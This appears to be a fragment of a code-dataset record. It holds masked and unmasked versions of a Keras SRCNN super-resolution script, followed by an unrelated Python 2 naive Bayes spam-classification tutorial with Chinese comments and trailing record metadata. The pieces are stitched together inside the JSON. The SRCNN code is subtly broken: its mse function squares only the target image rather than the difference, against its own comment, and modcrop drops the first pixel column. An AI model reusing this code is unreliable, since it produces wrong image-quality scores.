return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\nprepare_images('source_images/', 2)\nfor file in os.listdir('images/'):\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n scores = compare_images(target, ref)\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0],\n scores[1], scores[2]))\n\n\ndef model():\n SRCNN = Sequential()\n SRCNN.add(Conv2D(filters=128, kernel_size=(9, 9), activation='relu',\n padding='valid', use_bias=True, input_shape=(None, None, 1)))\n SRCNN.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', use_bias=True))\n SRCNN.add(Conv2D(filters=1, kernel_size=(5, 5), activation='linear',\n padding='valid', use_bias=True))\n adam = Adam(learning_rate=0.0003)\n SRCNN.compile(loss='mean_squared_error', optimizer=adam, metrics=[\n 'mean_squared_error'])\n return SRCNN\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\n<mask token>\nprint(\"\"\"Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[0][0],\n scores[0][1], scores[0][2]))\nprint(\"\"\"Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[\n 1][0], scores[1][1], scores[1][2]))\n<mask token>\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])\n",
"step-4": "<mask token>\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n<mask token>\n\n\ndef psnr(target, ref):\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n diff = ref_data - target_data\n diff = diff.flatten('C')\n rmse = math.sqrt(np.mean(diff ** 2))\n return 20 * math.log10(255.0 / rmse)\n\n\ndef mse(target, ref):\n err = np.sum(target.astype('float') ** 2)\n err /= float(target.shape[0] * target.shape[1])\n return err\n\n\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel=True))\n return scores\n\n\ndef prepare_images(path, factor):\n for file in os.listdir(path):\n img = cv2.imread(path + '/' + file)\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n img = cv2.resize(img, (int(new_width), int(new_height)),\n interpolation=cv2.INTER_LINEAR)\n img = cv2.resize(img, (int(w), int(h)), interpolation=cv2.INTER_LINEAR)\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n\n\nprepare_images('source_images/', 2)\nfor file in os.listdir('images/'):\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n scores = compare_images(target, ref)\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0],\n scores[1], scores[2]))\n\n\ndef model():\n SRCNN = Sequential()\n SRCNN.add(Conv2D(filters=128, kernel_size=(9, 9), activation='relu',\n padding='valid', use_bias=True, input_shape=(None, None, 1)))\n SRCNN.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu',\n padding='same', use_bias=True))\n SRCNN.add(Conv2D(filters=1, kernel_size=(5, 5), activation='linear',\n padding='valid', use_bias=True))\n adam = Adam(learning_rate=0.0003)\n SRCNN.compile(loss='mean_squared_error', optimizer=adam, metrics=[\n 'mean_squared_error'])\n return SRCNN\n\n\ndef modcrop(img, scale):\n tmpsz = img.shape\n sz = tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border:-border, border:-border]\n return img\n\n\ndef predict(image_path):\n srcnn = model()\n srcnn.load_weights('3051crop_weight_200.h5')\n path, file = os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n temp = cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype=float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float) / 255\n pre = srcnn.predict(Y, batch_size=1)\n pre *= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n return ref, degraded, output, scores\n\n\nref, degraded, output, scores = predict('images/flowers.bmp')\nprint(\"\"\"Degraded Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[0][0],\n scores[0][1], scores[0][2]))\nprint(\"\"\"Reconstructed Image: \nPSNR: {}\nMSE: {}\nSSIM: {}\n\"\"\".format(scores[\n 1][0], scores[1][1], scores[1][2]))\nfig, axs = plt.subplots(1, 3, figsize=(20, 8))\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 17 17:24:39 2020\n\n@author: code\n\"\"\"\n\nimport sys\nimport keras\nimport cv2\nimport numpy\nimport matplotlib\nimport skimage\n\nprint('Python: {}'.format(sys.version))\nprint('Numpy: {}'.format(numpy.__version__))\nprint('Keras: {}'.format(keras.__version__))\nprint('Matplotlib: {}'.format(matplotlib.__version__))\nprint('OpenCV: {}'.format(cv2.__version__))\nprint('Skimage: {}'.format(skimage.__version__))\n\n\n#import necessary packages\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, Input\nfrom keras.optimizers import SGD, Adam\nfrom skimage.measure import compare_ssim as ssim\nfrom matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\nimport math\nimport os\n\n#define A function for peak signal to noise ration(PSNR)\ndef psnr(target, ref):\n #assume RGB/BGR image\n target_data = target.astype(float)\n ref_data = ref.astype(float)\n \n diff = ref_data - target_data\n diff = diff.flatten('C')\n \n rmse = math.sqrt(np.mean(diff ** 2))\n \n return 20*math.log10(255. / rmse)\n\n\n#define function for mean Squared error(MSE)\ndef mse(target, ref):\n #mse is the sum pf the squared difference between the two image\n \n err = np.sum((target.astype('float'))** 2)\n err /= float(target.shape[0] *target.shape[1])\n \n return err\n \n#define function that combines all three image quality metrics\ndef compare_images(target, ref):\n scores = []\n scores.append(psnr(target, ref))\n scores.append(mse(target, ref))\n scores.append(ssim(target, ref, multichannel = True))\n \n return scores\n\n#prepare degraded images by introducing quality distortions via resizing\n \ndef prepare_images(path, factor):\n \n #loop throgh filesin the directory\n for file in os.listdir(path):\n \n #open the file\n img = cv2.imread(path +'/' + file)\n \n #find old and new image dimensions\n h, w, c = img.shape\n new_height = h / factor\n new_width = w / factor\n \n #resize the image -down\n img = (cv2.resize(img, (int(new_width), int(new_height)), interpolation = cv2.INTER_LINEAR))\n img = (cv2.resize(img, (int(w), int(h)), interpolation = cv2.INTER_LINEAR))\n \n #save the image\n print('Saving {}'.format(file))\n cv2.imwrite('images//{}'.format(file), img)\n \nprepare_images('source_images/', 2)\n\n#testing the generated images using image quality matrics\n\nfor file in os.listdir('images/'):\n \n #open target and reference images\n target = cv2.imread('images/{}'.format(file))\n ref = cv2.imread('source_images/{}'.format(file))\n \n #calculate the scores\n scores = compare_images(target, ref)\n \n #print all three scores\n print('{}\\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(file, scores[0], scores[1], scores[2]))\n \n#define the SRCNN model\n \ndef model():\n #define the model type\n SRCNN = Sequential()\n \n #add model layers\n SRCNN.add(Conv2D(filters = 128, kernel_size = (9,9), activation ='relu', padding = 'valid', use_bias = True, input_shape = (None, None, 1)))\n SRCNN.add(Conv2D(filters = 64, kernel_size = (3,3), activation ='relu', padding = 'same', use_bias = True ))\n SRCNN.add(Conv2D(filters = 1, kernel_size = (5,5), activation ='linear', padding = 'valid', use_bias = True))\n\n #define optimizer\n adam = Adam(learning_rate = 0.0003)\n #compile model\n SRCNN.compile(loss ='mean_squared_error', optimizer = adam, metrics =['mean_squared_error'])\n \n return SRCNN\n\n\n#define necessary image processing functions\ndef modcrop(img, scale):\n \n tmpsz = img.shape\n sz= tmpsz[0:2]\n sz = sz - np.mod(sz, scale)\n img = img[0:sz[0], 1:sz[1]]\n return img\n\n\ndef shave(image, border):\n img = image[border: -border, border: -border]\n return img\n\n#define main prediction function\ndef predict(image_path):\n \n #load the srcnn model with weights\n srcnn =model()\n srcnn.load_weights('3051crop_weight_200.h5')\n \n #load the degraded and reference images\n path, file =os.path.split(image_path)\n degraded = cv2.imread(image_path)\n ref = cv2.imread('source_images/{}'.format(file))\n \n #preprocess the image with modcrop\n ref = modcrop(ref, 3)\n degraded = modcrop(degraded, 3)\n \n #convert the image to YCrCb -srcnn trained on Y channel\n temp =cv2.cvtColor(degraded, cv2.COLOR_BGR2YCrCb)\n \n #create image slice and normalize\n Y = np.zeros((1, temp.shape[0], temp.shape[1], 1), dtype = float)\n Y[0, :, :, 0] = temp[:, :, 0].astype(float)/ 255\n \n #perform super resolution with srcnn\n pre = srcnn.predict(Y, batch_size = 1)\n \n #post process the output\n pre*= 255\n pre[pre[:] > 255] = 255\n pre[pre[:] < 0] = 0\n pre = pre.astype(np.uint8)\n \n #copy Y channel back to image and convert to BGR\n temp = shave(temp, 6)\n temp[:, :, 0] = pre[0, :, :, 0]\n output = cv2.cvtColor(temp, cv2.COLOR_YCrCb2BGR)\n \n #remove border from reference and degraded image\n ref = shave(ref.astype(np.uint8), 6)\n degraded = shave(degraded.astype(np.uint8), 6)\n \n #image quality calculations\n scores = []\n scores.append(compare_images(degraded, ref))\n scores.append(compare_images(output, ref))\n \n #return images and scores\n return ref, degraded, output, scores\n \n \n \nref, degraded, output, scores = predict('images/flowers.bmp')\n\n#print all score for all images\nprint('Degraded Image: \\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(scores[0][0], scores[0][1], scores[0][2]))\nprint('Reconstructed Image: \\nPSNR: {}\\nMSE: {}\\nSSIM: {}\\n'.format(scores[1][0], scores[1][1], scores[1][2]))\n\n#display images as subplots\nfig, axs = plt.subplots(1, 3, figsize = (20, 8))\naxs[0].imshow(cv2.cvtColor(ref, cv2.COLOR_BGR2RGB))\naxs[0].set_title('Original')\naxs[1].imshow(cv2.cvtColor(degraded, cv2.COLOR_BGR2RGB))\naxs[1].set_title('Degraded')\naxs[2].imshow(cv2.cvtColor(output, cv2.COLOR_BGR2RGB))\naxs[2].set_title('SRCNN')\n\n\n#remove the x and y tick marks\nfor ax in axs:\n ax.set_xticks([])\n ax.set_yticks([])",
"step-ids": [
3,
7,
9,
10,
12
]
}
|
[
3,
7,
9,
10,
12
] |
# coding=utf-8
from numpy import *
""" 1
函数loadDataSet()创建了一些实验样本。 该函数返回的第一个变量是进行词条切分后的文档集合, 这些文档来自斑点犬爱好者留言
板。 这些留言文本被切分成一系列的词条集合, 标点符号从文本中去掉,
loadDataSet( )函数返回的第二个
变量是一个类别标签的集合。 这里有两类, 侮辱性和非侮辱性。 这些文本的类别由人工标注, 这些标注信息用于训练程序以便自动检测侮辱性留言
"""
def loadDataSet():
postingList=[['my', 'dog', 'has', 'flea', 'problems', 'help', 'please'],
['maybe', 'not', 'take', 'him', 'to', 'dog', 'park', 'stupid'],
['my', 'dalmation', 'is', 'so', 'cute', 'I', 'love', 'him'],
['stop', 'posting', 'stupid', 'worthless', 'garbage'],
['mr', 'licks', 'ate', 'my', 'steak', 'how', 'to', 'stop', 'him'],
['quit', 'buying', 'worthless', 'dog', 'food', 'stupid']]
classVec = [0,1,0,1,0,1] #1 is abusive, 0 not
return postingList,classVec
""" 2
函数createVocabList()会创建一个包含在所有文档中出现的不重复词的列表, 为此使用了Python的set数据类型。 将词条列表输给
set构造函数, set就会返回一个不重复词表。 首先, 创建一个空集合❶, 然后将每篇文档返回的新词集合添加到该集合中❷。 操作符|用于
求两个集合的并集, 这也是一个按位或(OR) 操作符在数学符号表示上, 按位或操作与集合求并操作使用相同记号
"""
def createVocabList(dataSet):
vocabSet = set([]) #create empty set
for document in dataSet:
vocabSet = vocabSet | set(document) #union of the two sets
return list(vocabSet)
""" 3
获得词汇表后, 便可以使用函数setOfWords2Vec(), 该函数的输入参数为词汇表及某个文档, 输出的是文档向量, 向量的每一元素为1或0,
分别表示词汇表中的单词在输入文档中是否出现。 函数首先创建一个和词汇表等长的向量, 并将其元素都设置为0❸。 接着, 遍历文档中的所有单词,
如果出现了词汇表中的单词, 则将输出的文档向量中的对应值
设为1。 一切都顺利的话, 就不需要检查某个词是否还在vocabList中, 后边可能会用到这一操作
"""
def setOfWords2Vec(vocabList, inputSet):
returnVec = [0]*len(vocabList)
for word in inputSet:
if word in vocabList:
returnVec[vocabList.index(word)] = 1
return returnVec
"""
先看看前三个函数的执行效果
"""
def test1():
listPosts, listClass = loadDataSet()
mVocabList = createVocabList(listPosts)
print mVocabList
setOfWords2Vec(mVocabList, listPosts[0])
# test1()
# ---------------------------训练算法: 从词向量计算概率--------------------------
"""
函数中的输入参数为文档矩阵trainMatrix, 以及由每篇文档类别标签所构成的向量trainCategory。 首先, 计算文档属于侮辱性文档
(class=1) 的概率, 即P(1)。 因为这是一个二类分类问题, 所以可以通过1-P(1)得到P(0)。 对于多于两类的分类问题, 则需要对代码稍加
修改。计算p(wi|c1) 和p(wi|c0), 需要初始化程序中的分子变量和分母变量❶。 由于w中元素如此众多, 因此可以使用NumPy数组快速计算这些
值。 上述程序中的分母变量是一个元素个数等于词汇表大小的NumPy数组。 在for循环中, 要遍历训练集trainMatrix中的所有文档。 一旦某
个词语(侮辱性或正常词语) 在某一文档中出现, 则该词对应的个数(p1Num或者p0Num) 就加1, 而且在所有的文档中, 该文档的总词数也
相应加1❷。 对于两个类别都要进行同样的计算处理。最后, 对每个元素除以该类别中的总词数❸。 利用NumPy可以很好实现,
用一个数组除以浮点数即可, 若使用常规的Python列表则难以完成这种任务, 读者可以自己尝试一下。 最后, 函数会返回两个向量和一个概率。
"""
def trainNB0(trainMatrix,trainCategory):
numTrainDocs = len(trainMatrix)
numWords = len(trainMatrix[0])
pAbusive = sum(trainCategory)/float(numTrainDocs)
# 1. (以下两行) 初始化概率
"""
利用贝叶斯分类器对文档进行分类时, 要计算多个概率的乘积以获得文档属于某个类别的概率, 即计算p(w0|1)p(w1|1)p(w2|1)。 如果其中一
个概率值为0, 那么最后的乘积也为0。 为降低这种影响, 可以将所有词的出现数初始化为1, 并将分母初始化为2
"""
p0Num = ones(numWords); p1Num = ones(numWords) # change to ones()
p0Denom = 2.0; p1Denom = 2.0 # change to 2.0
for i in range(numTrainDocs):
if trainCategory[i] == 1:
# 2. (以下两行) 向量相加
p1Num += trainMatrix[i]
p1Denom += sum(trainMatrix[i])
else:
p0Num += trainMatrix[i]
p0Denom += sum(trainMatrix[i])
# 3. 对每个元素做除法
"""
另一个遇到的问题是下溢出, 这是由于太多很小的数相乘造成的。 当计算乘积p(w0|ci)p(w1|ci)p(w2|ci)...p(wN|ci)时, 由于大部分因子都
非常小, 所以程序会下溢出或者得到不正确的答案。 (读者可以用Python尝试相乘许多很小的数, 最后四舍五入后会得到0。 ) 一种解决
办法是对乘积取自然对数。 在代数中有ln(a*b) = ln(a)+ln(b), 于是通过求对数可以避免下溢出或者浮点数舍入导致的错误。 同时, 采用
自然对数进行处理不会有任何损失。 图4-4给出函数f(x)与ln(f(x))的曲线。 检查这两条曲线, 就会发现它们在相同区域内同时增加或者减
少, 并且在相同点上取到极值。 它们的取值虽然不同, 但不影响最终结果。 通过修改return前的两行代码, 将上述做法用到分类器中:
"""
p1Vect = log(p1Num/p1Denom) # change to log()
p0Vect = log(p0Num/p0Denom) # change to log()
return p0Vect,p1Vect,pAbusive
def test2():
listPosts, listClass = loadDataSet()
# 构建了一个包含所有词的列表mVocabList
mVocabList = createVocabList(listPosts)
setOfWords2Vec(mVocabList, listPosts[0])
trainMat = []
for postinDoc in listPosts:
temp = setOfWords2Vec(mVocabList, postinDoc)
trainMat.append(temp)
# 文档属于侮辱类的概率pAb
p0v, p1v, pAb = trainNB0(trainMat, listClass)
print pAb
"""
接下来看一看在给定文档类别条件下词汇表中单词的出现概率, 看看是否正确。 词汇表中的第一个词是cute, 其在类别0中出现1次, 而在类别1中
从未出现。 对应的条件概率分别为0.041 666 67与0.0。 该计算是正确的。 我们找找所有概率中的最大值, 该值出现在P(1)数组第26个下标位
置, 大小为0.157 894 74。 在myVocabList的第26个下标位置上可以查到该单词是stupid。 这意味着stupid是最能表征类别1(侮辱性文档类)的单词。
"""
"""
代码有4个输入: 要分类的向量vec2Classify以及使用函数trainNB0()计算得到的三个概率。 使用NumPy的数组来计算两个
向量相乘的结果❶。 这里的相乘是指对应元素相乘, 即先将两个向量中的第1个元素相乘, 然后将第2个元素相乘, 以此类推。 接下来将词汇表
中所有词的对应值相加, 然后将该值加到类别的对数概率上。 最后, 比较类别的概率返回大概率对应的类别标签。 这一切不是很难, 对吧?
"""
def classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):
# 1. 元素相乘 分类计算的核心
p1 = sum(vec2Classify * p1Vec) + log(pClass1) # element-wise mult
p0 = sum(vec2Classify * p0Vec) + log(1.0 - pClass1)
if p1 > p0:
return 1
else:
return 0
"""
对文本做一些修改, 看看分类器会输出什么结果。 这个例子非常简单,但是它展示了朴素贝叶斯分类器的工作原理。
接下来,我们会对代码做些修改, 使分类器工作得更好。
函数setOfWords2Vec()稍加修改, 修改后的函数称为bagOfWords2Vec()
-----------------------------------准备数据: 文档词袋模型---------------------------------------
"""
def bagOfWords2VecMN(vocabList, inputSet):
returnVec = [0]*len(vocabList)
for word in inputSet:
if word in vocabList:
# todo 这个词的操作
returnVec[vocabList.index(word)] += 1
return returnVec
"""
函数是一个便利函数(convenience function) , 该函数封装所有操作, 以节省输入
"""
def testingNB():
listOPosts,listClasses = loadDataSet()
myVocabList = createVocabList(listOPosts)
trainMat=[]
for postinDoc in listOPosts:
trainMat.append(setOfWords2Vec(myVocabList, postinDoc))
p0V,p1V,pAb = trainNB0(array(trainMat),array(listClasses))
testEntry = ['love', 'my', 'dalmation']
thisDoc = array(setOfWords2Vec(myVocabList, testEntry))
print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))
testEntry = ['stupid', 'garbage']
thisDoc = array(setOfWords2Vec(myVocabList, testEntry))
print (testEntry,'classified as: ',classifyNB(thisDoc,p0V,p1V,pAb))
# testingNB()
# -----------------------------------使用朴素贝叶斯过滤垃圾邮件----------------------------
"""
准备数据: 切分文本
可以看到, 切分的结果不错, 但是标点符号也被当成了词的一部分。 可以使用正则表示式来切分句子, 其中分隔符是除单词、 数字外的任意字符串
"""
def textParse(bigString): #input is big string, #output is word list
import re
listOfTokens = re.split(r'\W*', bigString)
return [tok.lower() for tok in listOfTokens if len(tok) > 2]
""""
函数spamTest()对贝叶斯垃圾邮件分类器进行自动化处理。 导入文件夹spam与ham下的文本文件, 并将它们解析为词列表❶。 接下来
构建一个测试集与一个训练集, 两个集合中的邮件都是随机选出的。 本例中共有50封电子邮件, 并不是很多, 其中的10封电子邮件被随机选择
为测试集。 分类器所需要的概率计算只利用训练集中的文档来完成。Python变量trainingSet是一个整数列表, 其中的值从0到49。 接下
来, 随机选择其中10个文件❷。 选择出的数字所对应的文档被添加到测试集, 同时也将其从训练集中剔除。 这种随机选择数据的一部分作为训
练集, 而剩余部分作为测试集的过程称为留存交叉验证(hold-out crossvalidation) 。 假定现在只完成了一次迭代, 那么为了更精确地估计分类
器的错误率, 就应该进行多次迭代后求出平均错误率。接下来的for循环遍历训练集的所有文档, 对每封邮件基于词汇表并使
用setOfWords2Vec()函数来构建词向量。 这些词在traindNB0()函数中用于计算分类所需的概率。 然后遍历测试集, 对其中每封电子邮件进
行分类❸。 如果邮件分类错误, 则错误数加1, 最后给出总的错误百分比
"""
def spamTest():
docList=[]; classList = []; fullText =[]
for i in range(1,26):
wordList = textParse(open('email/spam/%d.txt' % i).read())
docList.append(wordList)
fullText.extend(wordList)
classList.append(1)
wordList = textParse(open('email/ham/%d.txt' % i).read())
docList.append(wordList)
fullText.extend(wordList)
classList.append(0)
vocabList = createVocabList(docList)# create vocabulary
trainingSet = range(50); testSet=[] # create test set
# (以下四行) 随机构建训练集
for i in range(10):
randIndex = int(random.uniform(0,len(trainingSet)))
testSet.append(trainingSet[randIndex])
# todo del这个操作步骤
del(trainingSet[randIndex])
trainMat=[]; trainClasses = []
# (以下四行) 对测试集分类
for docIndex in trainingSet:#train the classifier (get probs) trainNB0
trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
trainClasses.append(classList[docIndex])
# todo 入参出参的计算方法
p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))
errorCount = 0
for docIndex in testSet: #classify the remaining items
wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:
errorCount += 1
print ("classification error",docList[docIndex])
print ('the error rate is: ',float(errorCount)/len(testSet))
#return vocabList,fullText
# ------------------------自动化处理----------------------------------------
spamTest()
# ----------------------------- 4.7. 示例: 使用朴素贝叶斯分类器从个人广告中获取区域倾向---------------------------
""""
RSS源分类器及高频词去除函数
函数calcMostFreq() ❶。 该函数遍历词汇表中的每个词并统计它在文本中出现的次数, 然后根据出现次数从高到低对词典进行排序,
最后返回排序最高的30个单词。 你很快就会明白这个函数的重要性
以下四行) 计算出现频率
"""
def calcMostFreq(vocabList,fullText):
import operator
freqDict = {}
for token in vocabList:
freqDict[token]=fullText.count(token)
sortedFreq = sorted(freqDict.iteritems(), key=operator.itemgetter(1), reverse=True)
return sortedFreq[:30]
""""
函数localWords()使用两个RSS源作为参数。 RSS源要在函数外
导入, 这样做的原因是RSS源会随时间而改变。 如果想通过改变代码来
比较程序执行的差异, 就应该使用相同的输入。 重新加载RSS源就会得
到新的数据, 但很难确定是代码原因还是输入原因导致输出结果的改
变。 函数localWords()与程序清单4-5中的spamTest()函数几乎相
同, 区别在于这里访问的是RSS源❷而不是文件。 然后调用函
数calcMostFreq()来获得排序最高的30个单词并随后将它们移除❸。
函数的剩余部分与spamTest()基本类似, 不同的是最后一行要返回下
面要用到的值。
"""
def localWords(feed1,feed0):
import feedparser
docList=[]; classList = []; fullText =[]
minLen = min(len(feed1['entries']),len(feed0['entries']))
for i in range(minLen):
# 2 每次访问一条RSS源
wordList = textParse(feed1['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(1) #NY is class 1
wordList = textParse(feed0['entries'][i]['summary'])
docList.append(wordList)
fullText.extend(wordList)
classList.append(0)
# (以下四行) 去掉出现次数最高的那些词
vocabList = createVocabList(docList)#create vocabulary
top30Words = calcMostFreq(vocabList,fullText) #remove top 30 words
for pairW in top30Words:
if pairW[0] in vocabList: vocabList.remove(pairW[0])
trainingSet = range(2*minLen); testSet=[] #create test set
for i in range(20):
randIndex = int(random.uniform(0,len(trainingSet)))
testSet.append(trainingSet[randIndex])
del(trainingSet[randIndex])
trainMat=[]; trainClasses = []
for docIndex in trainingSet:#train the classifier (get probs) trainNB0
trainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))
trainClasses.append(classList[docIndex])
p0V,p1V,pSpam = trainNB0(array(trainMat),array(trainClasses))
errorCount = 0
for docIndex in testSet: #classify the remaining items
wordVector = bagOfWords2VecMN(vocabList, docList[docIndex])
if classifyNB(array(wordVector),p0V,p1V,pSpam) != classList[docIndex]:
errorCount += 1
print ('the error rate is: ',float(errorCount)/len(testSet))
return vocabList,p0V,p1V
def getTopWords(ny,sf):
import operator
vocabList,p0V,p1V=localWords(ny,sf)
topNY=[]; topSF=[]
for i in range(len(p0V)):
if p0V[i] > -6.0 : topSF.append((vocabList[i],p0V[i]))
if p1V[i] > -6.0 : topNY.append((vocabList[i],p1V[i]))
sortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)
print ("SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**")
for item in sortedSF:
print (item[0])
sortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)
print ("NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**")
for item in sortedNY:
print (item[0])
|
normal
|
{
"blob_id": "1a166a08c835caa8dd308d59227051751aff7c0f",
"index": 9059,
